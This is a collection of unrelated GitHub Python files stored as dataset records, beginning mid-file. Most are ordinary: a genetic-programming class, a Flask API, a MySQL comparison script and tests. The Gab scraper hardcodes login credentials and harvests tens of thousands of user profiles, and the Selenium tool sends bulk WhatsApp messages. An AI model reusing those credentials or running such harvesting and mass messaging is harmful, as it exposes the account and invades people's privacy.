line[0,0:-1]\n    linerest = line[1:,0:-1]\n    z = np.zeros((r-1,c))\n    \n    #Assembling blocks\n    subA = np.hstack((z,linerest[::-1,::-1]))\n    subB = np.hstack((linestrip,1,linestrip[::-1]))\n    subC = np.hstack((linerest,z[::-1,::-1]))\n    res = np.vstack((subA, subB, subC))\n    \n    #rotate transpose or flip\n    sect = np.fix((degrees%180)/45)\n    if sect == 1:\n        #transpose res\n        res = res.transpose()\n    elif sect == 2:\n        #90 deg rotation\n        res = np.rot90(res)\n    elif sect == 3:\n        #fliplr\n        res = np.fliplr(res)\n    #otherwise do nothing\n    \n    return res\n\n\n\n","repo_name":"shmueldanan/Branching_Angle","sub_path":"Branching_Angle/strel_func.py","file_name":"strel_func.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"42435257607","text":"#program to open camera using python\n\n\nimport cv2\ncam = cv2.VideoCapture(0)\n\nwhile cam.isOpened():\n    ret,frame = cam.read()\n    if not ret:  #stop when no frame could be read\n        break\n\n    cv2.imshow(\"man man\", frame)\n\n    if cv2.waitKey(10) == ord('q'):\n        break\n\ncam.release()\ncv2.destroyAllWindows()\n","repo_name":"johnirungumathenge/PYTHON","sub_path":"python_projects/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"13621185558","text":"import numpy as np\nfrom numpy.random import random, randint\nimport time\nfrom copy import deepcopy\nimport random as rnd\n\nfrom simplegp.Variation import Variation\nfrom simplegp.Selection import Selection\nfrom simplegp.DifferentialEvolution import DifferentialEvolution\nfrom PSO import PSO\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\nclass SimpleGP:\n\n    def __init__(\n            self,\n            fitness_function,\n            functions,\n            terminals,\n            pop_size=500,\n            crossover_rate=0.5,\n            mutation_rate=0.5,\n            max_evaluations=-1,\n            max_generations=-1,\n            max_time=60,\n            initialization_max_tree_height=4,\n            max_tree_size=20,\n            tournament_size=2,\n            genetic_algorithm=\"PSO\",\n            every_n_generation=1,\n            weight_tune_percent=0.05, # Put to 1 if all trees should be weight-tuned\n            weight_tune_selection=\"worst\", # Choose from \"best\", \"worst\", \"random\"\n            ga_population_size=40,\n            ga_iterations=100,\n            de_mutation_rate=0.3,\n            de_recombination_rate=0.3\n    ):\n\n        self.pop_size = pop_size\n        self.fitness_function = fitness_function\n        self.functions = functions\n        self.terminals = terminals\n        self.crossover_rate = crossover_rate\n        self.mutation_rate = mutation_rate\n        self.max_evaluations = max_evaluations\n        self.max_generations = max_generations\n        self.max_time = max_time\n        self.initialization_max_tree_height = initialization_max_tree_height\n        self.max_tree_size = max_tree_size\n        self.tournament_size = tournament_size\n        self.de_mutation_rate = de_mutation_rate\n        self.de_recombination_rate = de_recombination_rate\n        self.ga_iterations = ga_iterations\n        self.ga_population_size = ga_population_size\n\n        self.genetic_algorithm = genetic_algorithm\n        self.every_n_generation = every_n_generation\n        self.weight_tune_percent = weight_tune_percent\n        self.weight_tune_selection = weight_tune_selection\n\n        self.generations = 0\n\n    def __ShouldTerminate(self):\n        must_terminate = False\n        elapsed_time = time.time() - self.start_time\n        if self.max_evaluations > 0 and self.fitness_function.evaluations >= self.max_evaluations:\n            must_terminate = True\n        elif self.max_generations > 0 and self.generations >= self.max_generations:\n            must_terminate = True\n        elif self.max_time > 0 and elapsed_time >= self.max_time:\n            must_terminate = True\n\n        if 
must_terminate:\n print('Terminating at\\n\\t',\n self.generations, 'generations\\n\\t', self.fitness_function.evaluations, 'evaluations\\n\\t',\n np.round(elapsed_time, 2), 'seconds')\n\n return must_terminate\n\n def Run(self):\n self.start_time = time.time()\n\n population = []\n for i in range(self.pop_size):\n population.append(\n Variation.GenerateRandomTree(self.functions, self.terminals, self.initialization_max_tree_height))\n self.fitness_function.Evaluate(population[i])\n\n repeat = False # repeat if 3 times in a row the GP gets the same result for elite\n prev_fitness = 0\n count_repeat = 0 # number of times the same fitness value got repeated\n\n while not self.__ShouldTerminate():\n\n O = []\n\n for i in range(len(population) - 1):\n\n o = deepcopy(population[i])\n if (random() < self.crossover_rate):\n o = Variation.SubtreeCrossover(o, population[randint(len(population))])\n if (random() < self.mutation_rate):\n o = Variation.SubtreeMutation(o, self.functions, self.terminals,\n max_height=self.initialization_max_tree_height)\n\n if len(o.GetSubtree()) > self.max_tree_size:\n del o\n o = deepcopy(population[i])\n else:\n self.fitness_function.Evaluate(o)\n\n O.append(o)\n\n PO = population + O\n population = Selection.TournamentSelect(PO, len(population), tournament_size=self.tournament_size)\n\n # self.show_best_treesize_histogram(selected_population, population)\n\n if prev_fitness == np.round(self.fitness_function.elite.fitness, 3):\n count_repeat += 1\n else:\n prev_fitness = np.round(self.fitness_function.elite.fitness, 3)\n count_repeat = 0\n\n if count_repeat >= 2:\n repeat = True\n\n # if self.generations % self.every_n_generation == 0 and self.generations != 0:\n if repeat and self.genetic_algorithm:\n\n # Do the selection on the current population\n if self.weight_tune_percent != 1:\n if self.weight_tune_selection == \"random\":\n selection = list(range(len(population)))\n rnd.shuffle(selection)\n selected_population = [population[i] for i in\n selection[:int(self.weight_tune_percent * len(selection))]]\n else:\n fitness_pop = [p.fitness for p in population]\n arg_fitness = np.argsort(fitness_pop)\n sorted_population = [population[i] for i in arg_fitness]\n if self.weight_tune_selection == \"best\":\n selection = range(int(len(sorted_population) * self.weight_tune_percent))\n selected_population = [sorted_population[i] for i in selection]\n elif self.weight_tune_selection == \"worst\":\n total = len(sorted_population)\n selection = range(int(total - self.weight_tune_percent * total), total)\n selected_population = [sorted_population[i] for i in selection]\n else:\n selected_population = population\n\n # Tune the weights for every tree in the selected population\n print(self.genetic_algorithm, 'tuning on', self.weight_tune_selection, len(selected_population), 'of', len(population), 'trees:')\n for p in tqdm(selected_population):\n if len(p.GetSubtree()) > 1:\n nodes = p.GetSubtree()\n W = [] # weight vector\n for n in nodes:\n W.append(n.weights)\n # bounds needed for both algorithms\n bounds = [(-25, 25)] * len(W) * 2\n if self.genetic_algorithm == \"PSO\":\n pso = PSO(self.fitness_function.Evaluate, W, bounds, p, self.ga_population_size,\n self.ga_iterations, self.start_time, self.max_time)\n W = pso.solution()\n\n elif self.genetic_algorithm == \"DE\":\n W = DifferentialEvolution.main(self.fitness_function.Evaluate, p, bounds, self.ga_population_size, self.de_mutation_rate,\n self.de_recombination_rate, self.ga_iterations, self.start_time, self.max_time)\n\n nodes 
= p.GetSubtree()\n for n in nodes:\n n.weights = [W.pop(), W.pop()]\n\n repeat = False\n count_repeat = 0\n\n self.generations = self.generations + 1\n\n print('g:', self.generations, 'elite fitness:', np.round(self.fitness_function.elite.fitness, 3), ', size:',\n len(self.fitness_function.elite.GetSubtree()))\n\n return self.spreadsheet_string()\n\n def show_treesize_histogram(self, population):\n treesizes = []\n for p in population:\n treesizes.append(len(p.GetSubtree()))\n # print(treesizes)\n plt.hist(treesizes, bins=range(1, self.max_tree_size))\n plt.show()\n\n def show_best_treesize_histogram(self, best_population, total_population):\n total_treesizes = []\n for p in total_population:\n total_treesizes.append(len(p.GetSubtree()))\n best_treesizes = []\n for p in best_population:\n best_treesizes.append(len(p.GetSubtree()))\n bins = range(1, self.max_tree_size)\n plt.hist(total_treesizes, bins, label=\"total population\")\n plt.hist(best_treesizes, bins, label=\"best population\")\n plt.legend(loc='upper right')\n plt.show()\n\n def spreadsheet_string(self):\n elapsed_time = np.round(time.time() - self.start_time, 2)\n myList = [self.generations, self.fitness_function.evaluations, elapsed_time, self.pop_size, self.crossover_rate,\n self.mutation_rate, self.max_evaluations, self.max_generations, self.max_time,\n self.initialization_max_tree_height, self.max_tree_size, self.tournament_size, self.genetic_algorithm,\n self.weight_tune_percent, self.weight_tune_selection, self.ga_population_size, self.ga_iterations,\n self.de_mutation_rate, self.de_recombination_rate]\n result = ','.join(map(str, myList))\n return result\n\n def show_weight_histogram(self, weights, bounds):\n plt.hist(weights, range=bounds, bins=range(bounds[0], bounds[1], 2))\n plt.xlabel(\"Value of weights\")\n plt.ylabel(\"Frequency\")\n plt.title(\"Distribution of weights after weight-tuning\")\n plt.show()","repo_name":"thbolijn/SimpleGP","sub_path":"simplegp/Evolution/Evolution.py","file_name":"Evolution.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21937436090","text":"from flask import Flask, render_template, jsonify\nimport get_data\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"base.html\")\n\n@app.route(\"/artists\")\ndef get_artists():\n artist = get_data.get_all_artist()\n artist_arr=[{'id':i[0],'name':i[1]} for i in artist]\n return jsonify(artist_arr)\n\n@app.route(\"/songs/\")\ndef list_all_songs(id):\n songs= get_data.get_all_songs(id)\n artist= get_data.singer(id)\n artists = get_data.get_all_artist()\n songs_arr = [{'id':i[1], \"name\":i[0]} for i in songs]\n return jsonify(songs_arr)\n\n\n@app.route(\"/songs//lyrics/\")\ndef lyrics(sid,id):\n lyrics= get_data.get_lyrics(sid)\n songs= get_data.get_all_songs(id)\n artist= get_data.singer(id)\n artists = get_data.get_all_artist()\n print(lyrics)\n return jsonify(lyrics)\n\nif __name__== \"__main__\":\n app.run(debug=True) \n\n\n","repo_name":"meghahamon/Crawler","sub_path":"cr_flask.py","file_name":"cr_flask.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30367710556","text":"from helpers import Solution\n\nfrom os import path\n\nDIRS = path.dirname(path.dirname(path.abspath(__file__)))\n\nDEFAULT_DATA = path.join(DIRS, \"data\", \"Problem81.txt\")\n\n\nclass MinimalPathSumOfMatrix(Solution):\n def 
__init__(self, data_path=DEFAULT_DATA):\n assert path.exists(data_path)\n\n with open(data_path, 'r') as io_data:\n self.data = io_data.read().strip().split('\\n')\n self.data = list(map(lambda x: list(map(int, x.split(\",\"))), self.data))\n self.n, self.m = len(self.data), len(self.data[0])\n self.N = (self.n, self.m)\n\n def _chad_solution(self):\n for i in range(self.n - 1, -1, -1):\n for j in range(self.m - 1, -1, -1):\n x = 0\n if i < self.n - 1 and j < self.m - 1:\n x += min(self.data[i + 1][j], self.data[i][j + 1])\n elif i < self.n - 1:\n x += self.data[i + 1][j]\n elif j < self.m - 1:\n x += self.data[i][j + 1]\n\n self.data[i][j] += x\n return self.data[0][0]\n\n def solve(self):\n self._solve(chad=True)\n","repo_name":"jiduque/project-euler","sub_path":"solutions/Problem81.py","file_name":"Problem81.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9440261131","text":"#!/usr/bin/env python3\n\nimport mysql.connector\nfrom enum import Enum\nimport argparse, json\nfrom extractor import *\nfrom numbers import Number\n\n\nDIFF = Enum('DIFF', ['SAME', 'CRASH', 'LEN', 'CONTENT'])\n\ndbs = [33, 11]\ndb_configs = {}\nconns = {}\ncurs = {}\n\ndef build_msg(msg0, msg1):\n return f\"{dbs[0]}: {msg0}, {dbs[1]}: {msg1}\"\n\ndef config_db(dbname, user, password, port):\n config = {}\n config[\"user\"] = user\n config[\"password\"] = password\n config[\"port\"] = port\n db_configs[dbname] = config\n\ndef check_setup(cur, database):\n cur.execute(\"SELECT * FROM information_schema.tables\")\n tables = cur.fetchall()\n for line in tables:\n if len(line) > 0 and line[0] == database:\n return True\n\n print(f\"[ERR] missing {database} table\")\n return False\n\ndef setup_db(dbname):\n # host = /tmp\n config = db_configs[dbname]\n conn = mysql.connector.connect(**config)\n\n conns[dbname] = conn\n curs[dbname] = conn.cursor()\n\n return True\n \ndef execute_dml(conn, cur, dmls):\n for dml in dmls:\n print(\"+\", dml)\n try:\n cur.execute(dml)\n cur.fetchall()\n except:\n if \"DATABASE\" in dml:\n raise(Exception)\n else:\n print(\"Failed\")\n conn.commit()\n print(\"DONE\")\n\ndef execute_and_compare(cur1, cur2, query):\n print(\">\", query)\n err1 = None\n err2 = None\n try:\n cur1.execute(query)\n except Exception as e:\n err1 = e\n try:\n cur2.execute(query)\n except Exception as e:\n err2 = e\n\n if err1 and err2:\n return DIFF.SAME, build_msg(err1, err2)\n\n if not err1 and not err2:\n try:\n ret1 = cur1.fetchall()\n except Exception as e:\n err1 = e\n try:\n ret2 = cur2.fetchall()\n except Exception as e:\n err2 = e\n\n if err1 and err2:\n return DIFF.SAME, build_msg(err1, err2)\n \n if not err1 and not err2:\n if len(ret1) != len(ret2):\n return DIFF.LEN, build_msg(ret1, ret2)\n \n for i in range(len(ret1)):\n ret1[i] = tuple(str(x) if x else \"0\" for x in ret1[i])\n ret2[i] = tuple(str(x) if x else \"0\" for x in ret2[i])\n\n ret1.sort()\n ret2.sort()\n for i in range(len(ret1)):\n if ret1[i] != ret2[i]:\n return DIFF.CONTENT, build_msg(ret1, ret2)\n\n return DIFF.SAME, \"Same ret value\"\n\n return DIFF.CRASH, build_msg(err1, err2)\n\n\ndef main():\n log_dir = \"/home/mysql/sqlancer/target/logs_33_4hour/mysql\"\n test_db = \"database0\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--testdb\", default=test_db, required=False)\n parser.add_argument(\"--logdir\", default=log_dir, required=False)\n parser.add_argument(\"-i\", type=int, required=True)\n args = 
parser.parse_args()\n\n test_db = args.testdb\n log_dir = args.logdir\n qfile = f\"{log_dir}/{test_db}-cur.log\" \n\n for db in dbs:\n config_db(db, \"root\", \"\", f\"548{db}\")\n ok = setup_db(db)\n if not ok:\n return\n\n\n # extract queries\n print(\"[MSG] extract dml and query\")\n dmls, queries = extract_queries(qfile)\n\n # setup test db\n print(\"[MSG] setup test db\")\n for db in dbs:\n execute_dml(conns[db], curs[db], dmls)\n\n # execute queries and compare results\n query = queries[args.i]\n print(f\"[MSG] Test starts\")\n diff_query_ids = {DIFF.CRASH.value: [], \n DIFF.LEN.value: [], \n DIFF.CONTENT.value: []}\n comp, ret_str = execute_and_compare(curs[dbs[0]], curs[dbs[1]], query)\n print(f\"[{comp}]\", ret_str)\n for db in dbs:\n conns[db].commit()\n\n for db in dbs:\n conns[db].close()\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jenny011/ast2023-project","sub_path":"mysql_py/test_one.py","file_name":"test_one.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6367447232","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete, m2m_changed\n\nfrom activity.models import ActivityRecord\nfrom subtitles.models import SubtitleLanguage, SubtitleVersion\nfrom videos.models import Video, VideoUrl\nfrom videos import signals\nfrom videos import tasks\n\n@receiver(post_save, sender=SubtitleLanguage)\n@receiver(post_save, sender=SubtitleVersion)\n@receiver(post_save, sender=ActivityRecord)\n@receiver(post_delete, sender=VideoUrl)\n@receiver(post_delete, sender=SubtitleLanguage)\n@receiver(post_delete, sender=SubtitleVersion)\ndef on_video_related_change(sender, instance, **kwargs):\n if instance.video_id is not None:\n Video.cache.invalidate_by_pk(instance.video_id)\n\n@receiver(post_save, sender=Video)\ndef on_video_change(sender, instance, **kwargs):\n instance.cache.invalidate()\n\n@receiver(m2m_changed, sender=Video.followers.through)\ndef on_video_followers_changed(instance, reverse, **kwargs):\n if not reverse:\n instance.cache.invalidate()\n else:\n for video in instance.followed_videos.all():\n video.cache.invalidate()\n\n@receiver(signals.video_added)\ndef on_video_added(sender, video_url, **kwargs):\n tasks.save_thumbnail_in_s3.delay(sender.pk)\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/videos/signalhandlers.py","file_name":"signalhandlers.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"335990963","text":"from api import Gab\nimport json\n\ngab = Gab('dheerajpreddy', 'Test@123')\nuser_count = 1\nvisited = set()\nqueue = ['farmer-general']\n\nfp = open('data.json', 'w')\n\nwhile user_count < 50000 and queue:\n\ttry:\n\t\tuser_name = queue.pop(0)\n\t\tif user_name not in visited:\n\t\t\tuser = gab.getuser(user_name)\n\t\t\tjson.dump(user, fp)\n\t\t\tuser_count += 1\n\t\t\tprint (user_count)\n\t\t\tvisited.add(user_name)\n\t\t\tfollowers = gab.getfollowers(user_name, 200)\n\t\t\tfor user in followers:\n\t\t\t\ttry:\n\t\t\t\t\tfollower_username = user['username']\n\t\t\t\t\tif follower_username not in 
visited:\n\t\t\t\t\t\tqueue.append(follower_username)\n\t\t\texcept:\n\t\t\t\tcontinue\n\texcept:\n\t\tcontinue\nfp.close()\n","repo_name":"dheerajpreddy/GAB-Analysis","sub_path":"src/scrape_usernames.py","file_name":"scrape_usernames.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
{"seq_id":"335990963","text":"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.ion()\nplt.close('all')\n\n\n\nt = np.arange(100) + np.random.normal(0, 0.05, 100)\n\nt[t>50] += 50\n\nt[30] +=1\n\n\ndeltat = np.median(np.diff(t))\n\ntp = np.roll(t,1) + deltat\ntm = np.roll(t,-1) - deltat\n\n\ntnorm = np.median(np.column_stack((tp, t, tm)), axis=-1)\n\nplt.figure()\nplt.plot(tnorm, t-tnorm)\n\nplt.figure()\nplt.plot(np.diff(tnorm))","repo_name":"INRIM/tintervals","sub_path":"tests/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"}
{"seq_id":"26344022073","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nfrom functools import partial\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom openpyxl import load_workbook, cell\r\nimport time\r\nimport sys\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom tkinter import filedialog\r\n \r\ntop = Tk()\r\ntop.title(\"WhatsApp Application\")\r\n\r\ntop.geometry(\"600x400\")\r\nunsaved_Contacts = []\r\nfilename=\"\"\r\n\r\ndef openfile():\r\n    filename=filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"Excel file\",\"*.xlsx\"),(\"all files\",\"*.*\")))\r\n    messagebox.showinfo(\"Hello\", filename)\r\n    workbook = load_workbook(filename)\r\n    sheet = workbook[\"contact\"]\r\n    for cell in sheet['A']:\r\n        target = cell.value\r\n\r\n        unsaved_Contacts.append(target)\r\n    return\r\n\r\n    \r\ndef sendno(s1,s2):\r\n    str1 = (s1.get()) \r\n    str2 = (s2.get())\r\n    message = str1\r\n    target = str2\r\n    link = \"https://wa.me/\" + str2\r\n    chrome_options = Options()\r\n    chrome_options.add_argument('--user-data-dir=./User_Data')\r\n    driver = webdriver.Chrome(options=chrome_options)\r\n    wait = WebDriverWait(driver, 600)\r\n    driver.get(link)\r\n    driver.maximize_window()\r\n    print(\"QR scanned\")\r\n    try:\r\n        time.sleep(20)\r\n        input_box = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\r\n        for ch in message:\r\n            if ch == \"\\n\":\r\n                ActionChains(driver).key_down(Keys.SHIFT).key_down(Keys.ENTER).key_up(Keys.ENTER).key_up(Keys.SHIFT).key_up(Keys.BACKSPACE).perform()\r\n            else:\r\n                input_box.send_keys(ch)\r\n        input_box.send_keys(Keys.ENTER)\r\n        print(\"Message sent successfully\")\r\n    except NoSuchElementException:\r\n        print(\"Failed to send message\")\r\n    driver.close()\r\n    return\r\n\r\ndef sendcon(s1,s3):\r\n    str1 = (s1.get()) \r\n    str3 = (s3.get())\r\n    message = str1\r\n    target= '\"' + str3 + '\"'\r\n    link = \"https://web.whatsapp.com/\"\r\n    chrome_options = Options()\r\n    chrome_options.add_argument('--user-data-dir=./User_Data')\r\n    driver = webdriver.Chrome(options=chrome_options)\r\n    wait = WebDriverWait(driver, 600)\r\n    driver.get(link)\r\n    driver.maximize_window()\r\n    print(\"QR scanned\")\r\n    print(target)\r\n    try:\r\n        x_arg = '//span[contains(@title,' + target + ')]'\r\n        try:\r\n            time.sleep(20)\r\n            group_title = wait.until(EC.presence_of_element_located((By.XPATH, x_arg)))\r\n            group_title.click()\r\n        except:\r\n            print(\"contact not found\")\r\n        time.sleep(4)\r\n        input_box = driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\r\n        input_box.send_keys(str1)\r\n        input_box.send_keys(Keys.ENTER)\r\n        print(\"Message sent successfully\")\r\n        time.sleep(1)\r\n    except NoSuchElementException:\r\n        return\r\n    driver.close()\r\n    return\r\n\r\ndef sendall(s1): \r\n    str1 = (s1.get())\r\n    for i in unsaved_Contacts:\r\n        message=str1\r\n        link = \"https://wa.me/\" + str(i)\r\n        chrome_options = Options()\r\n        chrome_options.add_argument('--user-data-dir=./User_Data')\r\n        driver = webdriver.Chrome(options=chrome_options)\r\n        wait = WebDriverWait(driver, 600)\r\n        driver.get(link)\r\n        driver.maximize_window()\r\n        print(\"QR scanned\")\r\n        try:\r\n            time.sleep(20)\r\n            input_box = driver.find_elements_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')[0]\r\n            for ch in message:\r\n                if ch == \"\\n\":\r\n                    ActionChains(driver).key_down(Keys.SHIFT).key_down(Keys.ENTER).key_up(Keys.ENTER).key_up(Keys.SHIFT).key_up(Keys.BACKSPACE).perform()\r\n                else:\r\n                    input_box.send_keys(ch)\r\n            input_box.send_keys(Keys.ENTER)\r\n            print(\"Message sent successfully\")\r\n        except NoSuchElementException:\r\n            print(\"Failed to send message\")\r\n        driver.close()\r\n    return\r\n\r\nstring1 = StringVar() \r\nstring2 = StringVar()\r\nstring3 = StringVar()\r\n\r\nmno = Label(top, text = \"Enter Message\").place(x = 30,y = 50)\r\nmsg = Label(top, text = \"Enter Mobile No(91xxxxxxxxxx)\").place(x = 30, y = 90)\r\nrule = Label(top, text = \"Mobile no should have prefix of country code e.g. 91 for India\").place(x = 30, y = 130)\r\ncname = Label(top, text = \"Enter Contact Name\").place(x = 30, y = 170)\r\nques = Label(top, text = \"Want to send to multiple mobile numbers?? 
If yes, then\").place(x = 30, y = 210)\r\nfileup = Label(top, text = \"Select file(.xlsx) to upload\").place(x = 30, y = 250)\r\nquitapp = Label(top, text = \"Click on QUIT to cancel the App\").place(x = 30, y = 290)\r\n\r\n\r\ntxt1 = Entry(top,textvariable=string1).place(x = 250, y = 50) \r\ntxt2 = Entry(top,textvariable=string2).place(x = 250, y = 90)\r\ntxt3 = Entry(top,textvariable=string3).place(x = 250, y = 170)\r\n\r\nsendno = partial(sendno, string1, string2)\r\nsendcon = partial(sendcon, string1, string3)\r\nsendall = partial(sendall, string1)\r\n\r\nsendtono = Button(top, text = \"Send to Number\",command = sendno,activebackground = \"green\", activeforeground = \"white\").place(x =400, y = 90)\r\nsendtocon = Button(top, text = \"Send to Contact\",command = sendcon,activebackground = \"green\", activeforeground = \"white\").place(x = 400, y = 170)\r\nsendtoall = Button(top, text = \"Send to All\",command = sendall,activebackground = \"green\", activeforeground = \"white\").place(x = 400, y = 250)\r\nselbtn = Button(top, text = \"Select File\",command = openfile,activebackground = \"green\", activeforeground = \"white\").place(x = 250, y = 250)\r\ncancelbtn = Button(top, text = \"QUIT\",command = top.destroy,activebackground = \"green\", activeforeground = \"white\").place(x = 250, y = 290)\r\n \r\ntop.mainloop() \r\n","repo_name":"Shagufta38/Whatsapp_GUI","sub_path":"whatsapp_gui_working.py","file_name":"whatsapp_gui_working.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35068571559","text":"#!/usr/bin/python3\r\n\"\"\"Init models/review.py unittests.\r\nUnittest classes:\r\n TestReview_instantiation\r\n TestReview_save\r\n TestReview_to_dict\r\n\"\"\"\r\nimport os\r\nimport models\r\nimport unittest\r\nfrom datetime import datetime\r\nfrom time import sleep\r\nfrom models.review import Review\r\n\r\nglobal sleep_tm\r\nsleep_tm = 0.05\r\n\r\n\r\nclass TestReview_instantiation(unittest.TestCase):\r\n \"\"\"Unittests instantiation\"\"\"\r\n\r\n def test_no_args_instantiates(self):\r\n self.assertEqual(Review, type(Review()))\r\n\r\n def test_new_instance_stored_in_objects(self):\r\n self.assertIn(Review(), models.storage.all().values())\r\n\r\n def test_id_is_public_str(self):\r\n self.assertEqual(str, type(Review().id))\r\n\r\n def test_created_at_is_public_datetime(self):\r\n self.assertEqual(datetime, type(Review().created_at))\r\n\r\n def test_updated_at_is_public_datetime(self):\r\n self.assertEqual(datetime, type(Review().updated_at))\r\n\r\n def test_place_id_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.place_id))\r\n self.assertIn(\"place_id\", dir(reviewModel))\r\n self.assertNotIn(\"place_id\", reviewModel.__dict__)\r\n\r\n def test_user_id_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.user_id))\r\n self.assertIn(\"user_id\", dir(reviewModel))\r\n self.assertNotIn(\"user_id\", reviewModel.__dict__)\r\n\r\n def test_text_is_public_class_attribute(self):\r\n reviewModel = Review()\r\n self.assertEqual(str, type(Review.text))\r\n self.assertIn(\"text\", dir(reviewModel))\r\n self.assertNotIn(\"text\", reviewModel.__dict__)\r\n\r\n def test_two_reviews_unique_ids(self):\r\n reviewModel1 = Review()\r\n reviewModel2 = Review()\r\n self.assertNotEqual(reviewModel1.id, reviewModel2.id)\r\n\r\n def test_two_reviews_different_created_at(self):\r\n reviewModel1 = 
Review()\r\n sleep(sleep_tm)\r\n reviewModel2 = Review()\r\n self.assertLess(reviewModel1.created_at, reviewModel2.created_at)\r\n\r\n def test_two_reviews_different_updated_at(self):\r\n reviewModel1 = Review()\r\n sleep(sleep_tm)\r\n reviewModel2 = Review()\r\n self.assertLess(reviewModel1.updated_at, reviewModel2.updated_at)\r\n\r\n def test_str_representation(self):\r\n date_today = datetime.today()\r\n dateToday_repr = repr(date_today)\r\n reviewModel = Review()\r\n reviewModel.id = \"123456\"\r\n reviewModel.created_at = reviewModel.updated_at = date_today\r\n review_str = reviewModel.__str__()\r\n self.assertIn(\"[Review] (123456)\", review_str)\r\n self.assertIn(\"'id': '123456'\", review_str)\r\n self.assertIn(\"'created_at': \" + dateToday_repr, review_str)\r\n self.assertIn(\"'updated_at': \" + dateToday_repr, review_str)\r\n\r\n def test_args_unused(self):\r\n reviewModel = Review(None)\r\n self.assertNotIn(None, reviewModel.__dict__.values())\r\n\r\n def test_instantiation_with_kwargs(self):\r\n date_today = datetime.today()\r\n today_ios = date_today.isoformat()\r\n reviewModel = Review(\r\n id=\"345\", created_at=today_ios, updated_at=today_ios)\r\n self.assertEqual(reviewModel.id, \"345\")\r\n self.assertEqual(reviewModel.created_at, date_today)\r\n self.assertEqual(reviewModel.updated_at, date_today)\r\n\r\n def test_instantiation_with_None_kwargs(self):\r\n with self.assertRaises(TypeError):\r\n Review(id=None, created_at=None, updated_at=None)\r\n\r\n\r\nclass TestReview_save(unittest.TestCase):\r\n \"\"\"Unittests save method\"\"\"\r\n\r\n @classmethod\r\n def setUp(self):\r\n try:\r\n os.rename(\"file.json\", \"tmp\")\r\n except IOError:\r\n pass\r\n\r\n def tearDown(self):\r\n try:\r\n os.remove(\"file.json\")\r\n except IOError:\r\n pass\r\n try:\r\n os.rename(\"tmp\", \"file.json\")\r\n except IOError:\r\n pass\r\n\r\n def test_one_save(self):\r\n reviewModel = Review()\r\n sleep(sleep_tm)\r\n fst_updated_at = reviewModel.updated_at\r\n reviewModel.save()\r\n self.assertLess(fst_updated_at, reviewModel.updated_at)\r\n\r\n def test_two_saves(self):\r\n reviewModel = Review()\r\n sleep(sleep_tm)\r\n fst_updated_at = reviewModel.updated_at\r\n reviewModel.save()\r\n scd_updated_at = reviewModel.updated_at\r\n self.assertLess(fst_updated_at, scd_updated_at)\r\n sleep(sleep_tm)\r\n reviewModel.save()\r\n self.assertLess(scd_updated_at, reviewModel.updated_at)\r\n\r\n def test_save_with_arg(self):\r\n reviewModel = Review()\r\n with self.assertRaises(TypeError):\r\n reviewModel.save(None)\r\n\r\n def test_save_updates_file(self):\r\n reviewModel = Review()\r\n reviewModel.save()\r\n rvid = \"Review.\" + reviewModel.id\r\n with open(\"file.json\", \"r\") as f:\r\n self.assertIn(rvid, f.read())\r\n\r\n\r\nclass TestReview_to_dict(unittest.TestCase):\r\n \"\"\"Unittests to_dict method\"\"\"\r\n\r\n def test_to_dict_type(self):\r\n self.assertTrue(dict, type(Review().to_dict()))\r\n\r\n def test_to_dict_contains_correct_keys(self):\r\n reviewModel = Review()\r\n self.assertIn(\"id\", reviewModel.to_dict())\r\n self.assertIn(\"created_at\", reviewModel.to_dict())\r\n self.assertIn(\"updated_at\", reviewModel.to_dict())\r\n self.assertIn(\"__class__\", reviewModel.to_dict())\r\n\r\n def test_to_dict_contains_added_attributes(self):\r\n reviewModel = Review()\r\n reviewModel.middle_name = \"Airbanb\"\r\n reviewModel.my_number = 98\r\n self.assertEqual(\"Airbanb\", reviewModel.middle_name)\r\n 